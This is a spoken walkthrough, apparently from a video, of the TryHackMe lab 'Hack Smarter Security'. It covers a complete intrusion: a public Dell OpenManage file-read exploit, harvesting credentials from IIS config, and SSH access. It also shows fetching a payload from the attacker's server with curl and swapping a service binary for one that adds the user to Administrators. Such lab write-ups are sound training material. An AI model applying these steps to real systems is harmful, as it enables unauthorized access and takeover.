Hello everyone, good morning. In today's video, we are going to do a TryHackMe room. I recently came across this room. This room actually been created by a security researcher called Tyler Ramsby, and he actually designed this machine in an impressive way. So it's actually a Windows machine. So without further ado, let's try it. Now you are looking at the TryHackMe page, and this is the room, Hack Smarter Security. And here is the description or a tagline: can you hack the hackers? Let's read through the description. Your mission is to infiltrate the web server of notorious HackSmarter APT. This group is known for conducting malicious cyber activities, and it is imperative that we gather intel on their upcoming targets. The HackSmarter APT operates a well-protected web server fortified with advanced security measures. Your objective is to compromise their server undetected, extract the list of upcoming targets, and leave no trace of your presence. To begin, you will need to employ some extensive hacking skills and exploit any vulnerabilities in their server defenses. Remember, stealth and discretion are key. You must avoid triggering any alarms that could lead to a premature shutdown of the server or alert HackSmarter APT group to your presence. So looks like there is some sort of protection. Once you gain access to their server, navigate through their intricate network infrastructure, bypassing firewalls, encryption protocols, and other security layers. Locate the central repository where they store sensitive information, including their upcoming target list. Intel has reported this is located on the desktop of administrator user. And here they gave the location also. The previous line was intimidating, but this one looks like we know the place where to look at. Exercise caution as you retrieve the list. The HackSmarter APT group is known for employing countermeasures such as intrusion detection systems and advanced monitoring tools. It's crucial that you maintain a low profile and avoid leaving any traces that could compromise the mission or endanger your own safety. Upon successfully acquiring the list of upcoming target, transmit the data to our secure server using encrypted channels. This will ensure that our analysis can our analysts can analyze information and take appropriate action to protect the potential target from the cyber attacks. Remember, this is a high stakes mission, and the information you gather will be instrumental in dismantling the HackSmarter APT group's operations. Good luck, and may your skills lead you to success in this mission. So here is the description. A lot of things mentioned here, but hopefully when we begin, we will get some clarity. And here is the title and the IP address. I copied the IP address, and let me move through this machine. I created a directory for nmap. Here I am starting the nmap. The first step for the enumeration. So this is where we begin always. We have the IP address, so all we need to do is to scan the IP and find the list of services hosted on that. I pasted the IP address, SC for default script, SV for enumerate version, and -on to store the outcome in an nmap format. So I'll simply mention like HackSmart maybe APT, HackSmart APT looks okay, and -VV to enable the maximum verbosity looks okay. I'll give this. It asks for the password. Yeah. Now the scan began. First port is 3389. Looks like RDP is open, and port 80 is open, 22 is open, and surprisingly the port 21 FTP is open. And there is another weird port 1311. Let's look at that. The scan is underway. It will take some time. Meanwhile, we have port 80, so why don't we try looking at that. So here is the IP address, and I can see the HTTP title HackSmarterSec, and here is an image. When I keep my cursor, hope you can see the bottom left corner. It says index.html. So looks like the static page in HTML. Nothing special here. About.html, and it has some information. and when I hover my cursor on this, I don't see any interesting stuff. And here is one contact form, contact.html. So we got the contact form. So let's start the burp suite as well. Maybe we need to intercept the traffic that goes to web app. Fine. Hackers for hire. And here is an image. Maybe if you don't get any clue, we can download this image and use the EXIF tool to see the metadata of the image. So when we do that, we may get some potential information, some potential breakthrough, maybe some description or some username, whatever it could be. We might get some information. If we have any other choice, then we can try this. Fine. Now we got a lot of information. Look at this. Port 21, as I said, it is FTP, and looks like anonymous FTP login is allowed. Yeah, looks like it is tempting us to log in this. Maybe it is actually a hard level machine, I guess, in TryHackMe. It's a medium level. So we may need to look at this one. And yeah, we have two files in that. Credit cards vpawn.txt and stolen passport.png. So let's download these files also and look at that. Before that, let's explore this 22 SSH. So it's a weird config. SSH is configured on Windows operating system, and OpenSSH for Windows 7.7. Fine. Then port 80 HTTP. It says it is Microsoft IIS server, Internet Information Services, and list of the allowed methods and server header. Apart from that, yeah, 1311. So I'm not sure. Looks like it's a web application. It says a web application configured on port 1311. All right. It says Dell. Looks like some Dell application, Dell web application. Scrolling down. Yes, it is a web application. Do I get any information from this? Any interesting stuff? There is a target name, HackSmarterSec. Looks like this application name is HackSmarterSec. So we can got this. I mean, we can get this from this scan outcome. Apart from that, nothing else. So we got the results. We can enumerate the FTP. Before that, let's try to play with this form given in this. I'll enable the interceptor. I'll give the name test@test.com, and message please subscribe. Maybe sending this message. It is swinging. I'll go to the burp suite, and here is the request. I'm sending it to repeater. Well, it's a simple web request, nothing interesting. Sends 200. Okay, no response at all. So when I send this, it is not even saying, it is not even acknowledging. Let's confirm that. I'm forwarding it. Yes, it is not even acknowledging. So there is no acknowledging. What can we do? Maybe shall we try injecting some JavaScript, classic JavaScript cross-site scripting payload, injecting the JavaScript. I think the format matters here. And message, good place to inject. So nothing. We don't get anything. Let's look at the source code, the front-end source code. Nothing special. We don't see any interesting stuff here. Fine, nothing special. Closing this, moving to FTP. Before that, let's confirm we don't have anything else. 2019. This links brings me nowhere. I should have disabled it. Okay, why don't we try doing the GoBuster scan in parallel? GoBuster uh, directory, maybe. Yeah, directory scanning. Directory -u http:// the IP address. Okay, -word list user share sec list. No, user share word list sec list discovery web content draft small words .txt. I'm just outing it to gobuster.out. So it's scanning the web application. So looks like a static web app. Nothing special, just some CSS images and JavaScript location. Nothing is special so far. Fine. So let's look at that FTP while it progress. To connect FTP, I'll just use the word FTP utility. It is asking for the name anonymous. As I said, the anonymous login is allowed here. Anonymous access allowed, and password can be anything. We logged in. Let me check this. We have two files, credit card pawned and stolen password. Let's get both the files. Stolen passport. All right, we got both the files. So let's exit and inspect these files. So looks like some potential credit card numbers. So nothing special in this file apart from that. Here the machine creator tried to replicate the real world APT group. He added some decoy credit card numbers. So this is how a typical APT group would operate. EOG, Hack Smarter Security. It's a PNG image, some corruption. Looks like it corrupted in transit. Get stolen passport. File may not have transferred properly. Entering the extended passive mode. How to get out of passive mode in FTP. Here is a blog. Just run passive within the client. Passive mode off. No, it is not. It's not at all transferring now. Also, there is a command binary. How about using it? Type set to I. Can I download this now? Yeah. Finally, the command binary sorted the issue. I was able to download the file completely. Now I can quit. And EOG stolen passport. So this is the face of that machine creator, Tyler Ramsby, and I can see some decoy image. Nothing special, nothing interesting in this image. I don't see any sensitive information out of this. I mean, I don't get any sensitive information out of this. Maybe I need to move on. Well, okay. Cat nmap hack smarter apt 5+. 21 done. 22 to log in the SSH. Port 80. Maybe port 80. We already checked it, but we didn't get any juicy stuff, but 1311 to be inspected. Earlier we found 3389, right? Yeah, we did. Here is that. RDP is also open. I'll do one thing. I'll try to inspect that 1311 port. We may get some interesting stuff. 1311. Bad request. Combination of host and port requires TLS. So it's an encrypted session. I can see it is asking me to accept the risk and continue. I need to look for this. I need to look the certificate. I have to look at that. More information. Sorry. More information. Security view certificate. HackSmarter Sec. Dell HackSmarter Sec. All right. Self-signed certificate, and here is the system. It's a Dell manage system login. Looks like some server management stuff. OpenManage. Specify the manage node and enter credentials. Click submit. All right. Server admin. Ignore server certificate warning. Okay, we see a lot of stuff. Manage web server. It is bringing me to this login page. Support, bringing me to the dell.com. This is also bringing me to the dell.com. Manuals, yes, same location. About, we get any interesting stuff? It's taking some time. All right, I'll close this. I'll just try to enumerate with this Dell OpenManage. Dell OpenManage exploit. Let's search this. Top result is this. Administrator arbitrary file read. Looks like we got an interesting vulnerability. Read the file, and here is the link. This exploit is published by an employee of Rhino Security Labs, and this machine creator, Mr. Tyler Ramsby, he belongs to Rhino Security Labs. He works here, so I can see the relation now. Looks like this exploit has some link to with our room. Maybe our Dell OpenManage instance, this specific stuff is vulnerable to this CVE 2020-5377. So let's try to do some stuff. Let's try to do some enumeration. What kind of vulnerability is this? Version 9.4 or prior contain multiple path traversal vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability by sending crafted web API request containing directory traversal character sequences to gain file system access on the compromised management station. All right. Let me download this. Looks like a promising one. 49750. That's the script. And here what it exactly does. First I need to use Python and this exploit name and my IP and the target IP and target port. All right. This one is to bypass the authentication, and this one is to read the file, and you may see the location. So in this location it is actually giving the request to read the file. All right. We got this. We got the exploit in our hand. Maybe I need to check whether it is Python 2 or Python 3. It is written in Python 2. I need to convert it to Python 3. All right. Code 49750. Python 3 CV path replace line 114. What is the error? Line 114. inconsistent use of tabs. Did I correct this? Use of tabs or spaces, indentation, pylons. Looks like the indentation issue. Now the red line is disappeared. Module no found, not found. Base HTTP server. So here in this blog, Rhino Security Labs came up with a detailed blog, detailed stuff explaining this vulnerability, how it became vulnerable, and what could be done to exploit this. I think instead of referring that exploit DB, why don't we refer the Rhino Security Labs GitHub page? Here, I think they gave the link for that exploit. Here it is. So let me get this directly. So better to download this because it is not using that base HTTP server stuff. All right, I'll download this and replace it. Yes, I replace it. Okay. Now when I try to execute this, looks okay. It works. My IP address ifconfig 10.17.22.235. Sorry, paste. And the IP address of the machine, paste, colon 1311. Permission denied. It's taking some time. Let's see. Should be working. We get any stuff? Not positive. This one is finished. I don't see any interesting information. Just a static website. Shouldn't say static, but since it uses JavaScript, however, I get nothing from this website. Maybe our foothold through this 1311 stuff. Let's see. Let's confirm that. Yeah, here it is. We got that. We got some stuff. What it is? Maybe some file read. Since we know it's an arbitrary file read vulnerability, maybe we can try reading some file, right? Don't we? Windows host file location. Yeah, let's try to read this. So why don't we try reading this? I'm copying this and just putting the path here. Wow, we got that. Look at this. This is the host file of the target machine. So with this, we can confirm, we can clearly say we are able to read a specific file from our target system. And look at this. We are able to read. It is exposing some data. So if we know where to look, then we may able to get some sensitive information. Since we are against the IIS web server, it might be a wise decision to look at the locations related to that IIS web server. I actually got a couple of locations, so I'm just going to do look at those files. So if it gives any sensitive information, then we will be able to move further. So let's try to do that. Actually, I got that location. When you are up against that IIS web server, here I am suggesting you one location. Go to that location. It will be giving you information about the web application that is running. Okay, I'll go to that specific stuff. Yeah, C : / Windows System 32 and inet srv and then config inet srv config application host.config application host.config. So this is the location. Reading contents of C, Windows, System32, inet srv, config, application host.config gives nothing. Maybe I'll just try to use this. Copy, and here I'm pasting it. Do I get anything? No. I made a blunder mistake. Here is the spelling mistake. Paste. Application host.config. Yeah, here I got the content. So let's try to read this content. Oh, we got huge stuff. There are a lot of things in this file. Copying and putting it to a file. PrivEsc configuration section. So this is the configuration section. And what else we got? And here is the application name, HackSmarter SEC. And I can see the location also. Here is the location, inet pub www root HackSmarter sec. And let's enumerate further. I got the location. If I want to look at IIS configuration file, then I need to look for the web.config file. I already got the path. I know the file name. It is web.config. So let's try to get that. Here is the juicy stuff. Beautiful site. I got the password. I got the password of user Tyler. So we got a potential username and password. So let's store this somewhere safely and move further. Here is the username and password. Fine. All right. I got the username and password. Let's try using this username and password to log in SSH first, because that is the simplest stuff to test. And let's do that. Tyler at IP address 10.10.19.250 and the password yes and password. Wow, we got the SSH session. We were able to log in. Here is the stuff. We got the shell as user Tyler. We are in the CMD prompt. Let's go to desktop and see. Here we got the user flag. Well, looks fine. I'll then the next stuff we need to do is the privilege escalation. In Windows, we can use PrivEsc script like WinPiece, similar to LinPiece, and also there are a couple of other scripts also. So let's try to bring one of those. And do we have curl here? We do have WinPiece, Windows privilege escalation script. Releases, and here I got the WinPiece any, but I go with WinPiece.bat since it is lightweight. I'll go to THM HackSmarter security, dropping it here. Okay, fine. I'll host this file somewhere. Okay, Python 3 -m. I'm just specifying -m to bring the HTTP module. HTTP server. Server. All right, port 8000 is listening now, and our IP address is 10.17.22.235. So let's call this curl http:// IP address 8000 and the file name winpiece.batch. I need to out this. It is done. I got the batch file. So when I try running this file, what do I get? System cannot open the device or the file specified. I'm unable to run this file. Look at this. Earlier it was there, but some script is cleaning this up. The WinPiece file that I'm putting into it. So it is clear that we are not able to use the privilege escalation script. As I said, this APT group might incorporated some protection mechanism. Maybe I'll try to look for the other scripts. Windows privilege escalation alternative to WinPiece. Maybe after some enumeration, I'll stick with this PrivEsc check. Looks like a promising one. Let me grab this file, PrivEsc check, PowerShell script, and I have downloaded this. Is it still hosting? Yes, it is. I'll copy this file name, copy, and I'll go to this curl command and add the file name also. Yeah, I downloaded it. I keep using the command ls in Windows CMD. I need to change that habit. Fine. Okay. So here in this GitHub page itself, I can see some advisory to use that PrivEsc script. Dot space dot backward slash PrivEsc check. All right. I'll just paste this command and see what happens. We have the script, but however, what happened? Maybe I can switch to PowerShell. Yeah, it's a PowerShell script, right? So I need to switch to PowerShell. And here I am applying this command. Yeah, looks like it is executing. In a moment, we will get some outcome, I guess. Let's see. Through the script, I think I am invoking the module. I'm just importing the module and invoking the PrivEsc check PowerShell command. I think that's what happening here. Let's try. I think it is taking some time. Meanwhile, extended checks all reports. We can use these two tags to do the extended check, and here we can get the outcome format. We can prefer the whatever the format we need. We can mention that, and all-in-one command. Execution policy bypass. It has the execution policy bypass as well. Okay, I think we were able to get through. We were able to run this script. Fine. It gave some information. Let's read through this. Reconnaissance user identity informational. It has one informational vulnerability. Reconnaissance user groups. It is actually sharing the list of users. I mean list of groups that user part of. And privilege escalation. Informational not vulnerable. Okay. Credential access. Informational not found. Informational. Another informational stuff. Vulnerable kernel driver. Okay. Some advanced PrivEsc method. And privilege escalation informational. And here is the stuff. Status vulnerability high. This is what I was looking for. Spoofer scheduler. There is a program called Spoofer scheduler installed in this machine. So you can find it in the program files x86. So it's a 32-bit application installed in this path. Looks like it is vulnerable. What kind of vulnerability it is? Permission, right owner, delete, right attributes. So let's try to find vulnerabilities for this. Vulnerabilities. Unquoted service path. I think this is the vulnerability I was looking for. And I can see that here as well. Unquoted service path. Just nothing but, I'll explain it in a moment. Here you may see it has that exploit title. It is just querying that service. Once it queries, it founds its binary path. So we can do the same. We can query for the service because we knew it is actually being run in this machine, and if we are able to query this service, we'll be able to see that related binary. And what that unquoted service path is nothing but we can able to start or stop the service, and we can simply replace that binary with our binary. So what will happen if we stop the service, replace the binary with ours, and restart the service, then this specific binary will get executed. Whatever the binary we inserted, that will get executed, and it will give some potential stuff to us, some juicy stuff to us. It can be anything. Whatever the functionality you defined in that binary, it will be executed. Okay, so that's the stuff. Let's try to read through that. Here I'm getting program files 86 and ls. We are in PowerShell, right? So spoofer. So here is the path spoofer, and yeah, we found one VBS file. So hope you remember in our challenge description they gave some firewall configuration. So I think they kept this in mind and said, since they configured some firewall stuff, but in this case we are not going to use that VBS file. Instead we are going to use something else. I think we are going to use this binary. So let's confirm that in a moment, and for that I need to query the service, and the command I know is nothing but scqc the service name. The service name is nothing but spoofer scheduler. So this is the known vulnerability, and we know the service name also. So let's try the same. It's not giving anything. I think I need to use cmd. Just switch it to this. Yeah, here is the information. Normal auto start. It auto starts, and service start name local system, and here is the binary path. So this is what we were looking at. So hopefully we will be able to replace this binary, but before that we need to check the status of this service, right? So status spoofer scheduler. Yeah, now you can see it is currently running, but I can do start, stop, or restart by using the command sc query spoofer scheduler. Let me take a notes to see the service status. Fine, I took the notes. Okay, it is currently running, but it is stoppable. I can do this. I can do it by simply giving this sc stop service name. Now stop pending. I can see the status has changed. If I see this query, now the service state is stopped. Now we can able to switch that binary. Okay, I'll see which binary it is. So this is the binary. We need to replace this binary, and for that we need to create one binary first of all, right? So let's do that. Let's create one binary. I'll open a new file, select language, C language I'm using. I'm just stick with the basics. Group includer, weird name. I'm giving this name. let me call include std standard library dot h. Okay, integer main, and here I need to execute the system command, and the system command is nothing but to add a user command to add a user in Windows administrator group. Administrators group. Now I will look at the command. Here it is. Net local group. The account name is Tyler. We know we are the user Tyler, and I'm adding myself Tyler into the administrators group cmd.exe. So this should be the command. This should be the command. And I'm just enclosing it in a double quote. Return 0. So looks fine. Looks fine. Maybe we can try compiling this. I think this is the proper package, mingw-w64. So this is the proper package, I think. Yeah, this is the proper package. We got this mingw installed x86. Yes, I think here is the stuff. This is what I was looking for. mingw-w64, I guess. Which one to call? Not Linux. This is the one. Fine. Paste. The file to call. Group includer. a.exe, and we got the file a.exe. This is actually a Windows executable. Now I rename it to whatever, the spoofer scheduler or whatever. What was the file? The file name spoofer scheduler.exe. Copy. Here I am renaming the file a.exe to spoofer scheduler.file. We actually used this C program, and we simply compiled this program. Once this executable gets executed, it will execute this command cmd.exe. From cmd.exe it will execute net local group administrator Tyler. What this command does, it simply adds the user Tyler into the group administrators. Okay, now before doing that, here is my session. I need to look for the binary which is associated with that spoof scheduler. Okay, so let's do that. Here I am going to the previous path. I need to look in the program files directory, program files 86. So this is the directory, and here I got a folder spoofer. Let me open this, and here is the binary name, spoofer-scheduler. So this is the actual binary. Let me give that query actually. sc space query and the service name, spoofer scheduler. Hope this is the name. Yes, this is the service name, spoofer scheduler, and you may see the status. It is currently running, and I need to stop this service before I'm modifying this binary. Okay, so let me do that. sc stop spoofer scheduler. Now you can see the status is changed, and I'll just query it again. You can see this, the status and the service actually stopped. Now we can do the modification. First of all, we need to see the binary associated with that service, right? And to check that, I need to use the command sc space qc and the service name, spoofer scheduler. Yeah, and here you may see the binary name. It is the binary name spoofer-scheduler.exe. Okay, now we do have this here. We just created the binary, the malicious binary, and we just renamed it to spoofer-scheduler.exe, so which is the same as this name. Okay, now all we need to do is host this file and bring that file to this system, and simply replace it with the spoofer scheduler's original binary. Okay, sorry, replace this spoofer-scheduler original binary. Fine. Now yeah, looks okay. I'll host the web server. Before that, I need to check the IP address, right? The IP address is nothing but 10.17.22.235. Python 3 -m to denote the module. http.server is the HTTP module. Well, the HTTP service is started now. I do have curl here. I simply paste the IP address 8000, and the file name is spoofer scheduler. Okay, spoofer scheduler. I'll just output this as payload.exe. Okay, because already we have that original spoofer-scheduler.exe, so I'm just renaming it to payload.exe. Now it got transferred, and here is that file. Now let me remove this file. Before removing this file, I need to check whether I have the sufficient privilege to do the file write operation. So for that, I am using a command icacls, icalcs. Okay, icackles, I think, on the current directory, and you may see I'm in that users group, and I do have full control on this path. Okay, since I do have full control, I can able to delete, or I can do any sort of modification in this directory. Since I have that privilege, I'm just deleting the original binary. I already stopped the service, and you may see it got removed. Now what we need to do is to rename this file. Move, I guess move is the command, payload and the original binary name. Done. Then let me check this spoofer-scheduler. Yes, we do have this original binary, and ls-la spoofer scheduler 115532 115532. So that's the file size. It matches. So looks like we just added that malicious binary into this path. Now all we need to do is query this again, scqc spoofer scheduler, and it is already tagged with the specific binary name, and in this place we already added our malicious binary. Now we need to start this, right? And to start that, I'm using a command. First I will query. It is stopped. I start this service spoofer scheduler. I start this service spoofer scheduler. Now let's see what happens. It is taking some time, but once it started, it will eventually execute this binary, and that binary contains our code, which will include the user Tyler into the group administrators, and that's the command. So let's see what will happen. I got this error. However, if I exit this shell and log in again, hopefully I'll be a part of this administrators group. So let's check that. I need to get the credential. So this is the password. Who am I? /groups. Still, I'm not part of the administrators group because I just noticed that I made a mistake here. I should have added /c. I just added cmd.exe and subsequently the command whatever it is, and I need to modify that. So let me modify that in quickly. I'm using nano editor this time, group includer, and here I need to execute this /c, and I'm writing this file. Yeah, I just did the modification. Again, I will call you x8664 yes, w64, that is the Windows w64 mingw32 and gcc I guess, C compiler, and now I need to mention that group includer, and here is the binary. I'll remove this real spoof scheduler, sorry, rm-rf, I removed it, and renaming a.exe to spoof scheduler, cat ls-la ls spoof scheduler. I have python 3 -m http.server. Again I started, and here is the, I need to check for that command curl. What is the IP address of this? 10.17.22.235 http://ip 8000, the port number, and the binary name, the file we need to pull. Okay, -o payload.exe looks okay. It is pulling the file. Okay, here is the file. I need to change the path. cd program files, spoofer. It downloaded this file. I'll remove this spoofer scheduler. By mistake I removed the spoofer CLI, but I need to remove the spoofer scheduler. Yeah, here is the file name. Let me copy this and move payload.exe to this file name. Okay, now scqc spoofer -scheduler query is the command to see the status. It is stopped state. It is in the stopped state. Fine. I need to change the binary, right? So let me do that. Move payload.exe. Where is that file? Payload.exe. Payload.exe to spoofer scheduler.exe. Yes, I need to overwrite. And now I rewrote that. Let me start the service now. I need to sc start spoofer-scheduler. Okay, now I'll exit and log in again. Credentials, let's copy, paste. Okay, who am I group, and look at this. Now I'm part of administrators group. Earlier I wasn't. Yeah, we got the administrator privilege. So let's get into the administrators directory. Desktop. They already mentioned the data the next target list is present in, they already mentioned their next target list present in the administrator location, and here you can see the hacking targets. So this is the stuff. We were able to escalate our privileges because they installed a vulnerable application called Spoofer, and it was vulnerable to that unquoted path vulnerability. We were able to replace the binary associated with the service, and that eventually led us to take the, that eventually led us to take the privileged shell or execute any command as a privileged user. So that's how we cracked this. And we have done this machine. So this is the machine I was trying to explain. Initially, during the enumeration, there were a lot of things to divert us. We got the FTP files, couple of files, and they were just decoy files, just to trick us, nothing else. And apart from that, we had one web service, a typical web service running on port 80, and it was not a vulnerable one. It was actually a static website, nothing special in that website as well. And then we got to know there is a website running in port 1311, and that is the Dell OpenManage server management application, a kind of server management web app. And fortunately, we found that the specific version is vulnerable to arbitrary file read, and we got the ready to use exploit from the internet, and we used it, and we were able to read the IAS config. So once it is done, from that config we got the credentials. It was exposing the credentials, and we logged in the system, and we found the spoofer application which was vulnerable to the PrivEsc, and that's how we did this box. Really impressive one. I did stuck in some places. I referred few write-ups, and they used some complex way to escalate their privileges. They used some NIM programming languages to write the exe and all, but that was not sufficient in our case. We just used a simple C program that executes a system command, and we were able to add ourselves into admin group, and we cracked the escalated shell. That's it. So this is what I exactly wanted to showcase. Hope you really liked it. If you really did, do consider doing that YouTube algorithms, like, comment, subscribe. You can also share this video among your friends. That's it. I'll catch you next time with another exciting one. Until then, I'll see you. Thank you, and I love you all. Thank you so much.